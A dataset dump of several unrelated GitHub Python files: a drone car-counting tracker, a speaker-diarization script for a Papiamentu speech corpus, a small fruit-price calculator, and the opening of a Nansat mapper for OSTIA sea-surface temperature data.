frame.shape\n # print(height)\n # print(width)\n\n # Detecting objects 00392\n 
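# (added note) 1/255 = 0.00392 is the usual YOLO input scale (hence the comment above); the 0.00261 used below is the author's custom value\n 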
blob = cv2.dnn.blobFromImage(frame, 0.00261, (416, 416), (0, 0, 0), True, crop=False)\n net.setInput(blob)\n \n outs = net.forward(output_layers)\n class_ids = []\n result = []\n confidences = []\n boxes = []\n liste = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > 0.2:\n # Object detected\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n\n # Rectangle coordinates\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n \n if frame_id < 20:\n x1=240\n else:\n x1=350\n y1=600\n \n if x1 < center_y < y1 and w > 20:\n idd=1\n else:\n idd=0\n \n boxes.append([x, y, w, h, idd])\n \n boxes_ids = tracker.update(boxes)\n # print(boxes_ids)\n boxes_ids_list = []\n new_id_list =[]\n \n for i in range(len(boxes_ids)):\n if boxes_ids[i][4] not in boxes_ids_list:\n boxes_ids_list.append(boxes_ids[i][4])\n new_id_list.append(boxes_ids[i])\n for box_id in new_id_list:\n x, y, w, h, id = box_id\n cv2.putText(frame, str(id), (x+3 , y + h-5), cv2.FONT_HERSHEY_PLAIN, 2, (0,0,0), 2)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0,0,255), 3)\n print(new_id_list)\n # cv2.imshow(\"FRAME\",frame)\n\n try:\n _,_,_,_,val = max(new_id_list, key=lambda item: item[4])\n if val > top_count:\n top_count = val\n except:\n pass\n cv2.putText(frame, \"Abdul Mannan\", (905, 90), font, 3, (0, 0, 255), 2)\n cv2.putText(frame, str(top_count), (1800, 90), font, 3, (0, 0, 255), 2)\n\n writer.write(frame) \n cv2.imshow(\"Car Counting\", frame)\n \n k = cv2.waitKey(1) & 0xff \n if k == 27:\n break\n\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"Abdulmannan1122/Drone_car_detector","sub_path":"tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38218606927","text":"from typing import List, Tuple, Dict, Optional\nfrom collections import Counter, defaultdict\nimport os\n\nimport numpy as np\nimport pandas as pd\nfrom functools import cache\nfrom umap import UMAP\nimport sounddevice as sd\nfrom sklearn.metrics import f1_score\nfrom pydub import AudioSegment\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\nfrom rich import print\nfrom sklearn.linear_model import LogisticRegression\nimport rich\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom spectralcluster import (\n SpectralClusterer,\n RefinementOptions,\n ThresholdType,\n ICASSP2018_REFINEMENT_SEQUENCE,\n)\n\nfrom lists import UTTERANCES_TO_IGNORE_IN_CLUSTERING, BAD_UTTERANCES\nfrom plot_diarization import plot_diarization\n\nRANDOM_SEED = 50 # 42\nEXCLUDE_PITO = True\nnp.random.seed(RANDOM_SEED)\nN_BIBLE_SAMPLES = None\nKNOWN_SPEAKERS = { # Some quick hand-labeling\n 104010101: \"male_john_main\",\n 104010201: \"male_john_main\",\n 104010301: \"male_john_main\",\n 104010401: \"male_john_main\",\n 104010501: \"male_john_main\",\n 104010601: \"male_john_main\",\n 104010701: \"male_john_main\",\n 104010801: \"male_john_main\",\n 104010901: \"male_john_main\",\n 104011001: \"male_john_main\",\n 104011101: \"male_john_main\",\n 104011201: \"male_john_main\",\n 104011301: \"male_john_main\",\n 104011401: \"male_john_main\",\n 104011501: \"male_john_main\",\n 104011601: \"male_john_main\",\n 104011701: \"male_john_main\",\n 104011801: 
\"male_john_main\",\n 104011901: \"male_john_main\",\n 104012202: \"nbg\",\n 104012203: \"nbg\",\n 104012602: \"ndst\",\n 104012702: \"ndst\",\n 104013001: \"ndst\",\n 104013101: \"ndst\",\n 101050301: \"male_jesus_main\",\n 101050401: \"male_jesus_main\",\n 101050501: \"male_jesus_main\",\n 101050601: \"male_jesus_main\",\n 101050701: \"male_jesus_main\",\n 101050801: \"male_jesus_main\",\n 101050901: \"male_jesus_main\",\n 101051001: \"male_jesus_main\",\n 101051101: \"male_jesus_main\",\n 101051201: \"male_jesus_main\",\n 101051301: \"male_jesus_main\",\n 101051401: \"male_jesus_main\",\n 101051501: \"male_jesus_main\",\n 101051601: \"male_jesus_main\",\n 101051701: \"male_jesus_main\",\n 101051801: \"male_jesus_main\",\n 101051901: \"male_jesus_main\",\n 101052001: \"male_jesus_main\",\n 101052101: \"male_jesus_main\",\n 101052201: \"male_jesus_main\",\n 101052301: \"male_jesus_main\",\n 101052401: \"male_jesus_main\",\n 101052501: \"male_jesus_main\",\n 101052601: \"male_jesus_main\",\n 101052701: \"male_jesus_main\",\n 101052801: \"male_jesus_main\",\n 101052901: \"male_jesus_main\",\n 101053001: \"male_jesus_main\",\n 101053101: \"male_jesus_main\",\n 101053201: \"male_jesus_main\",\n 101053301: \"male_jesus_main\",\n 101053401: \"male_jesus_main\",\n 101053501: \"male_jesus_main\",\n 101053601: \"male_jesus_main\",\n 101053701: \"male_jesus_main\",\n 101061302: \"male_jesus_main\",\n 101041601: \"ang\",\n 101041602: \"ang\",\n 101012101: \"god\",\n 101012301: \"gabr\",\n 101012302: \"gabr\",\n 119111801: \"ang2\",\n 101010101: \"male_matthew_main\",\n 101010201: \"male_matthew_main\",\n 101010301: \"male_matthew_main\",\n 101010401: \"male_matthew_main\",\n 101010501: \"male_matthew_main\",\n 101010601: \"male_matthew_main\",\n 101010701: \"male_matthew_main\",\n 101010801: \"male_matthew_main\",\n 101010901: \"male_matthew_main\",\n 101011001: \"male_matthew_main\",\n 101011101: \"male_matthew_main\",\n 101011201: \"male_matthew_main\",\n 101011301: \"male_matthew_main\",\n 101011401: \"male_matthew_main\",\n 101011501: \"male_matthew_main\",\n 101011601: \"male_matthew_main\",\n 101011701: \"male_matthew_main\",\n 101011801: \"male_matthew_main\",\n 101011901: \"male_matthew_main\",\n 119120101: \"female_hebrews_main\",\n 119120201: \"female_hebrews_main\",\n 119120301: \"female_hebrews_main\",\n 119120401: \"female_hebrews_main\",\n 119120501: \"female_hebrews_main\",\n 119111001: \"female_hebrews_main\",\n 119111101: \"female_hebrews_main\",\n 119111201: \"female_hebrews_main\",\n 119111301: \"female_hebrews_main\",\n 119111401: \"female_hebrews_main\",\n 119111501: \"female_hebrews_main\",\n 119111601: \"female_hebrews_main\",\n 119111701: \"female_hebrews_main\",\n 119132101: \"female_hebrews_main\",\n 103030001: \"female_hebrews_main\",\n 101030001: \"female_hebrews_main\",\n 119132103: \"female_hebrews_main\",\n 103030001: \"female_hebrews_main\",\n 102060101: \"male_mark_main\",\n 102060102: \"male_mark_main\",\n 102060303: \"male_mark_main\",\n 102060601: \"male_mark_main\",\n 102060701: \"male_mark_main\",\n 102061701: \"male_mark_main\",\n 102061901: \"male_mark_main\",\n 102062101: \"male_mark_main\",\n 102062201: \"male_mark_main\",\n 102062401: \"male_mark_main\",\n 102062701: \"male_mark_main\",\n 102063001: \"male_mark_main\",\n 103010101: \"male_luke_main\",\n 103010201: \"male_luke_main\",\n 103010301: \"male_luke_main\",\n 103010401: \"male_luke_main\",\n 103010501: \"male_luke_main\",\n 103010601: \"male_luke_main\",\n 103010701: \"male_luke_main\",\n 
103010801: \"male_luke_main\",\n 103010901: \"male_luke_main\",\n 103011001: \"male_luke_main\",\n 103011101: \"male_luke_main\",\n 103011201: \"male_luke_main\",\n 103010101: \"male_acts_main\",\n 103010201: \"male_acts_main\",\n 103010301: \"male_acts_main\",\n 103010401: \"male_acts_main\",\n 105011001: \"male_acts_main\",\n 105011302: \"male_acts_main\",\n 105012301: \"male_acts_main\",\n 105020301: \"male_acts_main\",\n 105020601: \"male_acts_main\",\n 105030202: \"male_acts_main\",\n 106010101: \"male_paul_main\",\n 106010201: \"male_paul_main\",\n 106010301: \"male_paul_main\",\n 106010401: \"male_paul_main\",\n 106010501: \"male_paul_main\",\n 106010601: \"male_paul_main\",\n 106010701: \"male_paul_main\",\n 106010801: \"male_paul_main\",\n 106010901: \"male_paul_main\",\n 106011001: \"male_paul_main\",\n 106011101: \"male_paul_main\",\n 106011201: \"male_paul_main\",\n 106011301: \"male_paul_main\",\n 106011401: \"male_paul_main\",\n 106011501: \"male_paul_main\",\n 106011601: \"male_paul_main\",\n 106011701: \"male_paul_main\",\n 106101202: \"male_paul_main\",\n 108080302: \"male_paul_main\",\n 120010101: \"male_james_main\",\n 120010201: \"male_james_main\",\n 120010301: \"male_james_main\",\n 120010401: \"male_james_main\",\n 120010501: \"male_james_main\",\n 120010601: \"male_james_main\",\n 120010701: \"male_james_main\",\n 120010801: \"male_james_main\",\n 120010901: \"male_james_main\",\n 120011001: \"male_james_main\",\n 120011101: \"male_james_main\",\n 120011201: \"male_james_main\",\n 120011301: \"male_james_main\",\n 120011401: \"male_james_main\",\n 120011501: \"male_james_main\",\n 120011601: \"male_james_main\",\n 120011701: \"male_james_main\",\n 120011801: \"male_james_main\",\n 120011901: \"male_james_main\",\n 120012001: \"male_james_main\",\n 120012101: \"male_james_main\",\n 120012201: \"male_james_main\",\n 120012301: \"male_james_main\",\n 120012401: \"male_james_main\",\n 120012501: \"male_james_main\",\n 120012601: \"male_james_main\",\n 120012701: \"male_james_main\",\n 126010101: \"male_jude_main\",\n 126010201: \"male_jude_main\",\n 126010301: \"male_jude_main\",\n 126010401: \"male_jude_main\",\n 126010501: \"male_jude_main\",\n 126010601: \"male_jude_main\",\n 126010701: \"male_jude_main\",\n 126010801: \"male_jude_main\",\n 126010901: \"male_jude_main\",\n 126011101: \"male_jude_main\",\n 126011201: \"male_jude_main\",\n 126011301: \"male_jude_main\",\n 126011601: \"male_jude_main\",\n 126011701: \"male_jude_main\",\n 126011301: \"male_jude_main\",\n 121010101: \"male_peter_main\",\n 121010201: \"male_peter_main\",\n 121010301: \"male_peter_main\",\n 121010401: \"male_peter_main\",\n 121010501: \"male_peter_main\",\n 121010601: \"male_peter_main\",\n 121010701: \"male_peter_main\",\n 121010801: \"male_peter_main\",\n 121011001: \"male_peter_main\",\n 121012001: \"male_peter_main\",\n 121013001: \"male_peter_main\",\n 121014001: \"male_peter_main\",\n 104183902: \"crazy_fx\",\n}\n\nCLASS_WEIGHTS = {\n \"male_matthew_main\": 1.09649,\n \"_other_\": 0.15,\n \"male_jesus_main\": 0.5952,\n \"male_mark_main\": 1.98,\n \"male_acts_main\": 3.4,\n \"male_luke_main\": 2.60416,\n \"male_john_main\": 1.35,\n \"male_paul_main\": 1.30208,\n \"female_hebrews_main\": 1.48809,\n \"male_james_main\": 0.7716049,\n \"male_jude_main\": 1.488095,\n \"pito\": 0.32051,\n \"male_peter_main\": 1.98095,\n}\n\nprint(\"👷 Beginning script...\")\nprint(f\"🔢 {len(set(KNOWN_SPEAKERS.values()))} unique labels in labeled data\")\n_DF = 
pd.read_csv(\"corpus.csv\")\n_DF[\"speaker_embedding\"] = _DF[\"speaker_embedding\"].apply(\n lambda x: np.fromstring(x[1:-1], sep=\" \")\n)\n_X = _DF[\"speaker_embedding\"].tolist()\nSTD_SCALER = StandardScaler()\nSTD_SCALER.fit(_X)\n\n\n@cache\ndef load_data(use_known_speakers: bool = False) -> pd.DataFrame:\n bible_df = _DF[_DF[\"utterance_id\"] < 200000000]\n bible_df = bible_df[~bible_df[\"utterance_id\"].isin(BAD_UTTERANCES)]\n bible_df = bible_df[\n ~bible_df[\"utterance_id\"].isin(UTTERANCES_TO_IGNORE_IN_CLUSTERING)\n ]\n known_speakers_df = bible_df[bible_df[\"utterance_id\"].isin(KNOWN_SPEAKERS.keys())]\n if use_known_speakers:\n bible_df = known_speakers_df\n else:\n if N_BIBLE_SAMPLES is not None:\n bible_df = bible_df.sample(n=N_BIBLE_SAMPLES, random_state=RANDOM_SEED)\n bible_df = pd.concat([bible_df, known_speakers_df])\n bible_df = bible_df.drop_duplicates(subset=\"utterance_id\")\n if not EXCLUDE_PITO:\n pito_df = _DF[_DF[\"speaker\"] == \"Pito Salas\"]\n return pd.concat([bible_df, pito_df])\n else:\n return bible_df\n\n\n@cache\ndef get_speaker(utterance_id: int) -> str:\n if utterance_id in KNOWN_SPEAKERS:\n if (\n sum([KNOWN_SPEAKERS[utterance_id] == v for v in KNOWN_SPEAKERS.values()])\n >= 5\n ):\n return KNOWN_SPEAKERS[utterance_id]\n else:\n return \"_other_\"\n else:\n return \"pito\"\n\n\n@cache\ndef get_importances() -> Tuple[np.ndarray, np.ndarray, pd.Series]:\n df = load_data(use_known_speakers=True)\n X = df[\"speaker_embedding\"].tolist()\n X = STD_SCALER.transform(X)\n y = df[\"utterance_id\"].apply(get_speaker)\n y.index = df[\"utterance_id\"]\n # # Calculate class weights manually\n # class_frequencies = Counter(y)\n # total_samples = len(y)\n # class_weights = {\n # class_label: total_samples / (len(class_frequencies) * freq)\n # for class_label, freq in class_frequencies.items()\n # }\n class_weights = CLASS_WEIGHTS\n clf = LogisticRegression(\n class_weight=class_weights, random_state=RANDOM_SEED, max_iter=3000\n )\n clf.fit(X, y.tolist())\n abs_value_coefs = np.abs(clf.coef_)\n mean_coefs = np.mean(abs_value_coefs, axis=0)\n importances = MinMaxScaler().fit_transform(mean_coefs.reshape(-1, 1)).flatten()\n return importances, X, y\n\n\ndef play_fast_snippet_of_wav(\n fpath: str, begin_ms: int = 1000, end_ms: int = 3000, speed: float = 1.9\n) -> None:\n try:\n # Load the file with pydub\n audio = AudioSegment.from_file(fpath)\n if len(audio) > 2500:\n audio = audio[begin_ms:end_ms]\n if speed is not None and speed != 1:\n audio = audio.speedup(playback_speed=speed)\n audio = audio.fade_in(200).fade_out(200)\n # Convert the PyDub AudioSegment to a NumPy array for playback\n samples = np.array(audio.get_array_of_samples())\n if audio.channels == 2:\n samples = np.reshape(samples, (-1, 2))\n # Play the audio\n sd.play(samples, audio.frame_rate)\n except:\n return\n sd.wait()\n\n\ndef spectral_cluster(\n X: List[np.ndarray],\n proportion_weighted: float,\n n_umap_components: Optional[int],\n n_lda_components: Optional[int],\n **kwargs,\n) -> List[int]:\n X = STD_SCALER.transform(X)\n importances, X_bible, y_bible = get_importances()\n assert X.shape[1] == importances.shape[0]\n weighted_X = X * importances # Weighted by logistic regression importance\n X = X * (1 - proportion_weighted) + weighted_X * proportion_weighted\n if n_umap_components is not None or n_lda_components is not None:\n weighted_X_bible = X_bible * importances\n X_bible = (\n X_bible * (1 - proportion_weighted) + weighted_X_bible * proportion_weighted\n )\n # Apply UMAP\n if 
n_umap_components is not None:\n reducer = UMAP(\n n_components=n_umap_components,\n random_state=RANDOM_SEED,\n n_jobs=1,\n target_metric=\"categorical\",\n )\n encoded_y_bible = LabelEncoder().fit_transform(y_bible)\n reducer.fit(X_bible, encoded_y_bible)\n X = reducer.transform(X)\n # Apply LDA\n if n_lda_components is not None:\n y_bible = y_bible.index.map(get_speaker)\n weighted_X_bible = X_bible * importances\n X_bible = (\n X_bible * (1 - proportion_weighted) + weighted_X_bible * proportion_weighted\n )\n lda = LDA(n_components=n_lda_components)\n lda.fit(X_bible, y_bible)\n X = lda.transform(X)\n # Fit Spectral Clustering\n refinement_options = RefinementOptions(\n p_percentile=kwargs[\"p_percentile\"],\n gaussian_blur_sigma=kwargs[\"gaussian_blur_sigma\"],\n thresholding_type=ThresholdType.RowMax,\n thresholding_soft_multiplier=0.12,\n refinement_sequence=ICASSP2018_REFINEMENT_SEQUENCE,\n )\n clusterer = SpectralClusterer(\n min_clusters=kwargs[\"min_clusters\"],\n max_clusters=kwargs[\"max_clusters\"],\n refinement_options=refinement_options,\n max_spectral_size=kwargs[\"max_spectral_size\"],\n )\n labels = clusterer.predict(np.array(X))\n return labels, clusterer\n\n\ndef get_bible_f1s_and_clusters(df: pd.DataFrame) -> Tuple[dict, dict]:\n assert \"cluster\" in df.columns\n known_ids = set(KNOWN_SPEAKERS.keys()) # Filter to known bible speakers\n df = df[df[\"utterance_id\"].isin(known_ids)].copy()\n df[\"speaker_class\"] = df[\"utterance_id\"].apply(get_speaker)\n bible_f1s = {}\n bible_clusters = {}\n for speaker, group in df.groupby(\"speaker_class\"):\n if speaker == \"_other_\":\n continue\n speaker_cluster = group[\"cluster\"].value_counts().index[0]\n if speaker_cluster == -1:\n speaker_cluster = group[\"cluster\"].value_counts().index[1]\n is_spkr_most_common_cluster = group[\"cluster\"] == speaker_cluster\n tp = len(group[is_spkr_most_common_cluster])\n fp = len(group[~is_spkr_most_common_cluster])\n fn = len(df[df[\"cluster\"] == speaker_cluster]) - tp\n f1 = tp / (tp + 0.5 * (fp + fn))\n bible_f1s[speaker] = f1\n bible_clusters[speaker] = speaker_cluster\n return bible_f1s, bible_clusters\n\n\ndef get_results_info(predicted_clusters: List[int], df: pd.DataFrame) -> tuple:\n df[\"cluster\"] = predicted_clusters\n bible_f1s, bible_clusters = get_bible_f1s_and_clusters(df)\n df[\"is_pito\"] = df[\"speaker\"].apply(lambda x: \"Pito\" in x)\n if EXCLUDE_PITO:\n pito_cluster = None\n confusion_dict = None\n all_f1s = list(bible_f1s.values())\n else:\n pito_cluster = df[df[\"is_pito\"]][\"cluster\"].value_counts().index[0]\n if pito_cluster == -1:\n pito_cluster = df[df[\"is_pito\"]][\"cluster\"].value_counts().index[1]\n df[\"is_pito_most_common_cluster\"] = df[\"cluster\"] == pito_cluster\n pito_f1 = f1_score(df[\"is_pito\"], df[\"is_pito_most_common_cluster\"])\n confusion_dict = {\n \"TP\": df[\n (df[\"is_pito\"] == True) & (df[\"is_pito_most_common_cluster\"] == True)\n ].shape[0],\n \"TN\": df[\n (df[\"is_pito\"] == False) & (df[\"is_pito_most_common_cluster\"] == False)\n ].shape[0],\n \"FP\": df[\n (df[\"is_pito\"] == False) & (df[\"is_pito_most_common_cluster\"] == True)\n ].shape[0],\n \"FN\": df[\n (df[\"is_pito\"] == True) & (df[\"is_pito_most_common_cluster\"] == False)\n ].shape[0],\n }\n all_f1s = list(bible_f1s.values()) + [pito_f1]\n macro_f1 = np.mean(all_f1s)\n return macro_f1, pito_cluster, confusion_dict, bible_f1s, bible_clusters\n\n\ndef run_experiments(param_combos: List[dict], df: pd.DataFrame) -> tuple:\n best_f1 = 0\n best_pito_cluster = None\n 
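# (added note) accumulators for the best-scoring run across the parameter sweep\n 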
best_conf_dict = None\n best_prms = None\n best_lbls = None\n best_bible_f1s = None\n best_clusterer = None\n for params in param_combos:\n pred_labels, clusterer = spectral_cluster(\n X=X,\n **params,\n )\n f1, pito_cluster, conf_dict, bible_f1s, bible_clusters = get_results_info(\n pred_labels, df\n )\n print(f\"🧪 - F1: {f1:.2f} - NCls: {len(set(pred_labels))} - Prms: {params}\")\n if f1 > best_f1:\n best_f1 = f1\n best_prms = params\n best_lbls = pred_labels\n best_pito_cluster = pito_cluster\n best_conf_dict = conf_dict\n best_bible_f1s = bible_f1s\n best_clusterer = clusterer\n df[\"cluster\"] = best_lbls\n print(\"...\")\n print(f\"🏆 - F1: {best_f1:.2f} - NCls: {len(set(best_lbls))} - Prms: {best_prms}\")\n return (\n best_f1,\n best_pito_cluster,\n best_conf_dict,\n best_bible_f1s,\n best_clusterer,\n bible_clusters,\n )\n\n\ndef get_centroids(df: pd.DataFrame) -> Dict[int, np.ndarray]:\n centroids = {}\n for cluster in df[\"cluster\"].unique():\n cluster_df = df[df[\"cluster\"] == cluster]\n centroid = np.mean(cluster_df[\"speaker_embedding\"].tolist(), axis=0)\n centroids[cluster] = centroid\n return centroids\n\n\ndef get_closest_centroid_distance(x: np.ndarray, centroids: Dict[int, np.ndarray]):\n distances = []\n for centroid in centroids.values():\n distances.append(np.linalg.norm(x - centroid))\n return min(distances)\n\n\nPARAM_COMBOS = [\n {\n \"proportion_weighted\": 0.5, # 0.8\n \"n_umap_components\": 75,\n \"n_lda_components\": None,\n \"min_clusters\": 14,\n \"max_clusters\": 50,\n \"p_percentile\": 0.89,\n \"gaussian_blur_sigma\": 0.218,\n \"max_spectral_size\": 8_000,\n },\n]\n\n\n###################\n# RUN EXPERIMENTS #\n###################\n\ndf = load_data()\nX = df[\"speaker_embedding\"].tolist()\nf1, pito_cluster, conf_dict, bible_f1s, clusterer, bible_clusters = run_experiments(\n PARAM_COMBOS, df\n)\n\nif not EXCLUDE_PITO:\n print(\"📋 Pito Confusion Matrix:\")\n print(\"\\t❌ Predicted Pito but was something else (FP): \" + str(conf_dict[\"FP\"]))\n print(\"\\t❌ Predicted something else but was Pito (FN): \" + str(conf_dict[\"FN\"]))\n print(\"\\t✅ Predicted Pito and was Pito (TP): \" + str(conf_dict[\"TP\"]))\n print(\"👨 Pito Cluster:\", pito_cluster)\nprint(\"📖 Bible Clusters:\")\nfor speaker, cluster in bible_clusters.items():\n print(f\"\\t{speaker}: {cluster}\")\nprint(\"📖 Bible F1s:\")\nfor speaker, f1 in bible_f1s.items():\n print(f\"\\t{speaker}: {f1:.2f}\")\nprint(\"📊 Cluster Frequencies:\")\nprint(\"\\t\" + \"\\n\\t\".join(df[\"cluster\"].value_counts().__str__().split(\"\\n\")[1:-1]))\n\ncentroids = get_centroids(df)\ndf[\"degree_of_uncertainty\"] = df[\"speaker_embedding\"].apply(\n lambda x: get_closest_centroid_distance(x, centroids)\n)\ndf[\"degree_of_uncertainty\"] = (\n MinMaxScaler()\n .fit_transform(df[\"degree_of_uncertainty\"].values.reshape(-1, 1))\n .flatten()\n)\ndf.drop(columns=[\"speaker_embedding\"]).to_csv(\"clustered_corpus.csv\", index=False)\n\n##########################\n# PLOT FINAL DIARIZATION #\n##########################\n\ncluster_labels = df[\"cluster\"].unique()\ncluster_w_speaker_classes = {}\nfor cluster_label in cluster_labels:\n speaker_classes = []\n if cluster_label == pito_cluster:\n speaker_classes.append(\"Pito Salas\")\n for speaker, cluster in bible_clusters.items():\n if cluster == cluster_label:\n speaker_classes.append(speaker.split(\"_\")[1].title())\n speaker_classes = \"\\n\".join(speaker_classes)\n val = f\"{cluster_label}\\n{speaker_classes}\"\n cluster_w_speaker_classes[cluster_label] = 
val\ndf[\"speaker_classes_of_cluster\"] = df[\"cluster\"].map(cluster_w_speaker_classes)\n\ndf[\"author\"] = df[\"speaker\"].apply(lambda x: x.split(\"_\")[1].title() if \"_\" in x else x)\ndf[\"author\"] = df[\"author\"].apply(lambda x: f\"author: {x}\" if x != \"Pito Salas\" else x)\nplot_diarization(df)\n\n##########################################\n# LABEL UNCERTAIN AS BAD, IGNORE, & KEEP #\n##########################################\n\nuser_input = input(\"Would you like to label uncertain utterances? (y/n):\")\nif user_input == \"y\":\n uncertain_df = df[df[\"degree_of_uncertainty\"] > 0.5]\n uncertain_df = uncertain_df.sort_values(by=\"degree_of_uncertainty\", ascending=False)\n ignore, keep, bad = [], [], []\n for i, row in uncertain_df.iterrows():\n fpath = os.path.join(\"corpus_audio\", row[\"file_name\"])\n print(f\"📝 {row['utterance_id']}--{row['duration_ms'] / 1000:.2f}s\")\n play_fast_snippet_of_wav(fpath, begin_ms=1, end_ms=-1, speed=1)\n given_input = input(\n \"Select one: finish labeling (f), ignore (i), keep (k), bad (b):\"\n )\n if given_input == \"f\":\n break\n elif given_input == \"i\":\n ignore.append(row[\"utterance_id\"])\n elif given_input == \"k\":\n keep.append(row[\"utterance_id\"])\n elif given_input == \"b\":\n bad.append(row[\"utterance_id\"])\n print(\"📋 Bad:\")\n print(bad)\n print(\"📋 Ignore:\")\n print(ignore)\n\n########################################################\n# LISTENING TO/ASSESING QUALITY OF CLUSTERS ON THE FLY #\n########################################################\n\nuser_input = input(\"Would you like to listen to a speaker cluster? (y/n):\")\nif user_input == \"y\":\n user_input = input(\"Pick a cluster to listen to:\")\n n_seconds = input(\"For how many seconds would like to listen?\")\n n_seconds = int(n_seconds)\n selected_cluster = int(user_input)\n while selected_cluster in cluster_labels:\n fnames = df[df[\"cluster\"] == selected_cluster][\"file_name\"]\n fnames = fnames.sample(len(fnames)).to_list()\n fpaths = [os.path.join(\"corpus_audio\", fname) for fname in fnames]\n n_files_to_listen_to = int(n_seconds / 2)\n for fpath in fpaths[:n_files_to_listen_to]:\n play_fast_snippet_of_wav(fpath, begin_ms=1000, end_ms=3000)\n user_input = input(\"Pick a cluster to listen to (f=finish):\")\n if user_input == \"f\":\n break\n selected_cluster = int(user_input)\nchosen_dev_cluster = input(\"Pick a cluster to use for dev set:\")\n\n#####################\n# SAVING NEW CORPUS #\n#####################\ntry:\n BAD_UTTERANCES.update(bad)\nexcept NameError:\n pass\nnew_df = _DF.copy()\nnew_df = new_df[~new_df[\"utterance_id\"].isin(BAD_UTTERANCES)]\nnew_df.set_index(\"utterance_id\", inplace=True)\ndf.set_index(\"utterance_id\", inplace=True)\nnew_df[\"diarized_speaker\"] = df[\"cluster\"]\nnew_df.reset_index(inplace=True)\nnew_df['train_dev_test_split'] = 'train' # default to 'train'\nnew_df.loc[new_df['diarized_speaker'] == int(chosen_dev_cluster), 'train_dev_test_split'] = 'dev'\nnew_df.loc[new_df['speaker'] == 'Pito Salas', 'train_dev_test_split'] = 'test'\nnew_df.to_csv(\"diarized_corpus.csv\", index=False)\nprint(new_df['train_dev_test_split'].value_counts())\nprint(\"👷 Done!\")\n","repo_name":"sonnygeorge/papiamentu-asr-corpus","sub_path":"diarize.py","file_name":"diarize.py","file_ext":"py","file_size_in_byte":23429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41440963367","text":"\nprice_fruit = {\n 'Plátano': 1.35,\n 'Mazá': 0.80,\n 'Pera': 0.85,\n 'Laranxa': 
0.70\n}\n\n\ndef cal_price(fr, kg):\n if fr in price_fruit.keys():\n return kg * price_fruit[fr]\n else:\n return f\"{fr} no está disponible\"\n\n\nprint(cal_price(input(\"Introduce fruta\\n\"), int(input(\"Introduce kilos\\n\"))))\n","repo_name":"jsamperevazquez/Programacion_IA","sub_path":"python/tarea38.py","file_name":"tarea38.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33342379498","text":"# Name: mapper_opendap_ostia.py\n# Purpose: Nansat mapping for GHRSST Level 4 OSTIA Global Foundation Sea Surface\n# Temperature Analysis\n# Author: Artem Moiseev\n# Licence: This file is part of NANSAT. You can redistribute it or modify\n# under the terms of GNU General Public License, v.3\n# http://www.gnu.org/licenses/gpl-3.0.html\n\nfrom nansat.mappers.opendap import Opendap\nfrom nansat.nsr import NSR\nimport pythesint as pti\nimport os\nfrom datetime import datetime\nimport numpy as np\nimport json\nfrom netCDF4 import Dataset\n\n\nclass Mapper(Opendap):\n\n baseURLs = [\n 'https://podaac-opendap.jpl.nasa.gov:443/opendap/allData/ghrsst/data/L4/GLOB/UKMO/OSTIA',\n 'https://opendap.jpl.nasa.gov:443/opendap/OceanTemperature/ghrsst/data/L4/GLOB/UKMO/OSTIA'\n ]\n\n timeVarName = 'time'\n xName = 'lon'\n yName = 'lat'\n timeCalendarStart = '1981-01-01'\n srcDSProjection = NSR().wkt\n\n def __init__(self, filename, gdal_dataset, gdal_metadata, date=None,\n ds=None, bands=None, cachedir=None, *args, **kwargs):\n\n self.test_mapper(filename)\n timestamp = date if date else self.get_date(filename)\n ds = Dataset(filename)\n self.create_vrt(filename, gdal_dataset, gdal_metadata, timestamp, ds, bands, cachedir)\n self.dataset.SetMetadataItem('entry_title', str(ds.getncattr('title')))\n self.dataset.SetMetadataItem('data_center', json.dumps(pti.get_gcmd_provider('UK/MOD/MET')))\n self.dataset.SetMetadataItem('ISO_topic_category',\n pti.get_iso19115_topic_category('oceans')['iso_topic_category'])\n self.dataset.SetMetadataItem('gcmd_location', json.dumps(pti.get_gcmd_location('sea surface')))\n\n #mm = pti.get_gcmd_instrument('amsr-e')\n #ee = pti.get_gcmd_platform('aqua')\n #self.dataset.SetMetadataItem('instrument', json.dumps(mm))\n #self.dataset.SetMetadataItem('platform', json.dumps(ee))\n self.dataset.SetMetadataItem('platform/instrument',\n json.dumps(self.get_platform_and_instrument_list(ds)))\n\n @staticmethod\n def get_date(filename):\n \"\"\"Extract date and time parameters from filename and return\n it as a formatted (isoformat) string\n\n Parameters\n ----------\n\n filename: str\n nn\n\n Returns\n -------\n str, YYYY-mm-ddThh:MMZ\n\n \"\"\"\n _, filename = os.path.split(filename)\n t = datetime.strptime(filename.split('-')[0], '%Y%m%d')\n return datetime.strftime(t, '%Y-%m-%dT%H:%M:00Z')\n\n def convert_dstime_datetimes(self, ds_time):\n \"\"\"Convert time variable to np.datetime64\"\"\"\n ds_datetimes = np.array(\n [(np.datetime64(self.timeCalendarStart).astype('M8[s]')\n + np.timedelta64(int(sec), 's').astype('m8[s]')) for sec in ds_time]).astype('M8[s]')\n return ds_datetimes\n\n @staticmethod\n def get_platform_and_instrument_list(ds):\n \"\"\" This method uses the source_data in the OPeNDAP dataset to select the platforms\n and instruments. It checks the hardcoded dictionary, pi, to find the platform and instrument\n for products given in the source_data. 
